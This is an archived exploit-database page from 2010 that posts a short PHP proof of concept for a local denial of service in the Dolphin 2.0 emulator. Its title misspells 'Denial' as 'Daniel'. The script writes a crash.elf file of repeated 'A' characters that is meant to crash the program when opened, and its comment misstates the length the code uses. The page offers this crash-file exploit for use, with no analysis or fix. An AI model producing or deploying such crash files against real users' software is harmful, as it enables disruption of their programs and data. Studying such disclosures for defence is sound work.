Dolphin 2.0 (.elf) Local Daniel Of Service
Posted on 09 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Dolphin 2.0 (.elf) Local Daniel Of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================== Dolphin 2.0 (.elf) Local Daniel Of Service ========================================== <?php # Dolphin 2.0 (.elf) Local Daniel Of Service # Software Site: http://www.dolphin-emu.com/ # Software Download: http://www.dolphin-emu.com/downloads.php?cat_id=9&download_id=94 # Author: Pr0T3cT10n <pr0t3ct10n@gmail.com> # Site: http://www.nullbyte.org.il ################################################################## # Dolphin 2.0 is vulnerable to local denial of service attack. # When we try to open a file by 'Open(CTRL+O)' # that contains 9999 chars ('A'), so dolphin should crash. ################################################################## # PoC / Code: $buffer = str_repeat('A', 99999); # Create 9999 chars('A').. if(file_put_contents('crash.elf', $buffer)) { echo("File created successfuly. Dolphin should crash when you open the file with it. "); } else { echo("Can't create file. Try again. "); } # Cya :) # NULLBYTE.ORG.IL #################### ?> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-09]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>